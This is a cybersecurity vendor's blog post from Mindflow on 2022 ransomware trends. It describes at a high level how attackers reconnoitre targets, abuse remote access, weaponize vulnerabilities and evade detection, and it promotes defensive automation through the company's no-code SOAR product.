loader image
Mindflow won the Jury Prize at the FIC 2022 Startup Award! Get a demo to transform your SecOps forever.

Ransomware attacks 2022: State of the Threat

ransomware attacks 2022

Ransomware attacks have been on the rise these past two years. 2022 is coming and leaves us with the following question: will the attacks slow? These first three months, what we have experienced so far leaves us without much hope. Some major ransomware attacks in 2022 have already happened, and the pace is showing to be at least equal to 2021. This is why we’re creating a State of the Threat report: Ransomware attacks 2022.

Factors that led to the ransomware attacks’ upsurge in 2020 and 2021 are still here. A growing remote workforce, an accelerating digital transformation, and strains on supply chains create incredible opportunities for adversaries. Several critical vulnerabilities left many organizations at risk. This is no wonder that ransomware attacks increased 150% between 2020 and 2021.

Ransoms initially asked are also growing, with an average of above $5 million in the US. The ransomware economy evolves, making ransomware an accessible tool although destructive. The ransomware-as-a-service (RaaS) business model sets new trends and breaks records. It lowers the entry barrier for a ransomware attack to anyone with access to cryptocurrency.

Fortunately, defenders’ strategies and accessories are also evolving to keep up with the threat. Although we are to fear a continuous upsurge of the attacks or, at the minimum, persistence, we can leverage better ways and tools, such as automation and orchestration of our solutions, to strengthen our stance.

Below, we will look at the general attackers’ trends and bring answers for security teams to counter them efficiently.

Attackers look for your company’s details and your vulnerabilities before launching attacks

When talking about cyberattacks, one must differentiate between undifferentiated attacks and individualized ones. As for the individualized attacks, cyberattackers are increasingly looking to gain operational and organizational knowledge to know the company’s environment before launching their attacks. This knowledge includes operational and financial details, such as annual budgets, employee counts, revenue statistics, and organigrammes.

Once they gather these kinds of information, attackers can target highly profitable sectors and work under permanent urgency (like just-in-time industries that cannot afford prolonged disruption: transports or manufacturers).

Awareness programs and cyclical trainings are paramount

Of course, most of these pieces of information are publicly available on the internet. Most of the time, they are parts of legal obligations, such as financial reports, margins, or budgets. We’re not advocating for secrecy around these figures. However, a company should always be aware that these information pieces are available and constitute precious operational knowledge for attackers. This is why you need to keep up the efforts to engage your employees across your company about cybersecurity awareness. This goes by gamifying your campaigns and trainings to dedicate resources and proper teams.

Adding to the operational knowledge of the victim’s environment, attackers are also increasingly looking to understand the victim’s overall attack surface further. Knowing your systems and their potential vulnerabilities is also a way to access your network instead of deploying resources to compromise one of your employees’ credentials.

Take Microsoft Exchange Server vulnerabilities, for instance. Using CVE-2021-26855, the attacker could access your vulnerable exchange server without more knowledge than an email—no need to deploy social engineering to compromise BEC. From here, your organization has to have a near real-time understanding of its assets, particularly internet-facing ones, since they can be found via vulnerability scanners triggered by almost everyone as a reconnaissance technique.

Usually, an organization’s attack surface includes:

  • Internet-facing systems and services
  • Vulnerabilities or unpatched systems
  • Use of specific solutions or third-party vendors
  • Cloud services

The first step to creating an appropriate response to this threat is to gain awareness of your attack surface. Creating and maintaining a Configuration Management Database is one of your priorities, although challenging, given the growth of remote work and BYOD trends in many companies due to the pandemic and structural trends. Automating the CMDB Discovery is an interesting way of keeping as close as possible your CMDB to your actual attack surface.

This way, one can be fully aware of vulnerabilities potentially affecting their system in the light of new threats arising and can proactively manage the patching of their vulnerabilities.

Remote Access is a privileged way to inject payloads

The exponential growth in Remote Access Abuse is linked to the development in remote work. With the pandemic, the traditional security perimeter is obsolete. Your system is increasingly accessed from various locations, more and more outside the physical location of your enterprise and from an increasing number of devices: phones or laptops, from secured or unsecured local networks. In some cases, it became necessary to provide administrative functionality to an environment. This is often necessary for remote branches or with remote employees (which have recently surged).

The concern arises when the organization deploys remote access without observing minimal security configurations. Often, companies deploy remote access with a weak credentials policy or a single-factor authentication in a hurry.

Such remote access systems are vulnerable and easily exploited. Attackers can and have taken advantage of compromising the network access, even with correct security implementations. Even though some would say that the easiest way is to remove it altogether, actual business conditions are in dire need.

Advanced mitigation ways imply a Zero-trust architecture powered by a SOAR and accompanied by strong workflows of Suspicious login and suspicious activity monitoring.

Ransomware attacks 2022: ZT SOAR

Vulnerabilities are Weaponized more and more quickly

With a new vulnerability out, a race often starts between attackers and defenders to exploit or patch it the fastest. The more critical the vulnerability, the more challenging the race is.

Attackers often win this race, at least momentarily on top of being often aware of the breach sooner than defenders, especially regarding zero-day exploits. But one trend is worth noticing. The pace with which attackers are weaponizing vulnerabilities is becoming quicker than before.

When looking at significant vulnerabilities of 2021, namely the Microsoft Exchange Servers vulnerabilities of March and April and the Log4j in December, adversaries moved from a vulnerable code to a working exploit in a matter of hours after the announcement of the vulnerabilities. In hours, the working proof-of-concept code (PoC) was available on the internet to install web shells on vulnerable Microsoft Exchange Servers, allowing potential attackers to quickly take advantage of vulnerable systems before relevant patches were even available.

In this case, there are two remediation ways for security teams.

The first is, of course, to wait for the patches and implement them ASAP. As we said above, attackers are often quicker than defenders to exploit the vulnerabilities. Defenders need to rely on network and endpoint alternatives to look for prevention, detection, and response opportunities.

Here, gaining precise and most accurate intelligence about the threat is paramount. Automating IOCs and TTPs ingestion via Threat Intelligence feeds necessary to have deep knowledge of potential attacks using these vulnerabilities, the attackers’ profiles (and therefore, TTPs). This will allow security teams to add particular network rules, endpoint signatures, on top of behavioral monitoring to implement reliable defenses mechanisms until patches are out and applied.

Ransomware attacks 2022: TI SOAR

Attackers are trying to leave as little footprints as possible

Post-exploit, attackers are trying to leave as little footprint on the network and machines to avoid traditional detection mechanisms based on Indicators of Compromise (IoCs) during their intrusion. To that end, they resort to fileless or malware-less attacks.

Fileless malware uses Windows Registry or a remote location to store malicious code. It leaves little to no malware on the disk, thus evading traditional file-based detections or IoCs. Fileless malware may also be memory-only. Here, attackers download and deploy the code directly into memory, evading file-based detections.

Attackers also use native binaries on the system to evade traditional detections and remain hidden in plain sight during an intrusion. Attackers do something different from what the binary was intended (such as using Powershell to open a web shell to maintain access). They take advantage of Living Off the Land Binaries (LOLBins), which are binaries of a non-malicious nature, local to the operating system. They exploit them to camouflage their malicious activity, such as loading code into memory, downloading a file, or running a custom script.

Talking about binaries, attackers can rely on custom scripts or exploit kits on a victim system. They use PowerShell and post-exploitation frameworks, such as Cobalt Strike, to assist in achieving their objectives. Although using scripts and exploit kits leaves on-disk artifacts, they also provide easy-to-use ways to compromise multiple systems and stay in memory.

To mitigate these TTPs, organizations must rely on endpoint system memory monitoring and behavioral analysis tools. System memory monitoring can record what commands were executed on a system, regardless of the program running the piece of code.

Analysts can use tactics to flag action sequences or attempts to access memory. Based on these flags, systems can generate alerts for analysts to investigate. Memory monitoring could be set to detect activities related to a specific macro in Microsoft Word that is executing a PowerShell downloader described as an intermediate stage in an attack.

Ransomware attacks 2022: UEBA and SOAR

Attackers leverage Automation to hasten lateral movements

Talking about lateral movement once in the systems, attackers are becoming increasingly quick to gain privileged access. The DFIR describes an intrusion from zero to domain admin control and ransomware deployed within 42 hours. Another post describes an adversary that went from zero control to complete control in two hours.

Automation creates a predictable, thus detectable, sequence of events in predictable OS-based programming languages like PowerShell. As said above, security teams can use memory monitoring tools to create signatures for detection.

Furthermore, adversaries increasingly use offensive security tools, especially open-source toolkits and scripts. Therefore, they’re faster to deploy, but they leave footprints that an organization can easily track.

Ransomware attacks 2022: Security Automation and Orchestration

Attackers leverage automation to fasten parts of their attack and infrastructure. Security teams should also leverage it to harness its benefits: automated repetitive tasks, faster workflows, reduced errors, more time for more complex tasks.

Countering ransomware attacks needs many tools provided by different security vendors. Navigating between them implies time lost and fragmented frameworks. Also, there’s an answer to be found in Orchestration. Tools acting as the glue between all of these solutions, such as the Security Orchestration, Automation, and Response, are the pinpoint remedy to reduce the pane of glass and answer the lack of automation.

A SOAR helps to:

  •  Automate repetitive and low-value added tasks such as triage or parsing
  •  Design playbooks and determine specific triggers (an event or scheduled) to pre-build incident response workflows and harness machine-speed capabilities: circumvent ransomware attacks with triggers based on abnormal activity detected on an endpoint
  • Orchestrate flows between tools such as intelligence gathered on TI feeds to sharpen detection tools (up-to-date IOCs and TTPs and hierarchization based on criticity)
  • Frees up time for analysts to focus on higher value tasks

At first, leveraging another seems redundant and prone to more complexity. Yet, next-generation SOARs like Mindflow are based on a new set of values, far from your traditional SOAR. Mindflow uses the no-code approach to drastically reduce the time and skill barrier needed for your analyst to master and properly operate it. Pre-built actions and playbooks help your analyst create fine-tuned incident response plans to continuously adapt to the evolving threat: constantly ingest new IOCs and TTPs to update your detection rules or scheduled scans to keep your CMDB up-to-date, for instance.

Paul-Arthur Jonville

CEO of Mindflow. I share our thoughts and vision about cybersecurity and how Mindflow can answer current issues on this blog.

About Mindflow

Mindflow is an agnostic and no-code SOAR making cybersecurity more accessible to face current challenges. It aims to break silos between technologies and teams, following Fusion center and Cybersecurity Mesh concepts.

Recent Posts